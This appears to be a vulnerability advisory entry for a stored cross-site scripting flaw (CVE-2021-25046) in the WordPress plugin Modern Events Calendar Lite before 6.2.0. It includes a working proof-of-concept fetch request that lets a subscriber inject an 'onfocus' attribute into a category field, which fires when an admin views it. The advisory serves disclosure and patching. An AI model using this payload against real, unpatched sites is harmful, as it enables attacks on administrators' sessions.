Lucene search
Krzysztof ZającWPEX-ID:19C2F456-A41E-4755-912D-13683719BAE6HistoryDec 03, 2021 - 12:00 a.m.
Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS
2021-12-0300:00:00
Krzysztof Zając
35
0.001 Low
EPSS
Percentile
25.0%
The plugin alloed any logged-in user, even a subscriber user, may add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS.
1. Run the following JavaScript in the browser's web console as a subscriber user.
2. Authenticate in a separate browser as an admin user.
3. Go To "M.E. Calendar" -> Categories -> and click on "category" link.
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"mec_popup_event_category","mec_cat_color": 'color" onfocus=alert(1) autofocus=', "category": "category", "mec_cat_icon": "icon"}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));Related
prion
prion
Cross site scripting
2022-01-17 13:15:00
cvelist
cvelist
patchstack
patchstack
nvd
nvd
CVE-2021-25046
2022-01-17 13:15:07
wpvulndb
wpvulndb
cnvd
cnvd
cve
cve
CVE-2021-25046
2022-01-17 13:15:07
openvas
openvas
WordPress Modern Events Calendar Lite Plugin < 6.2.0 XSS Vulnerability
2022-01-18 00:00:00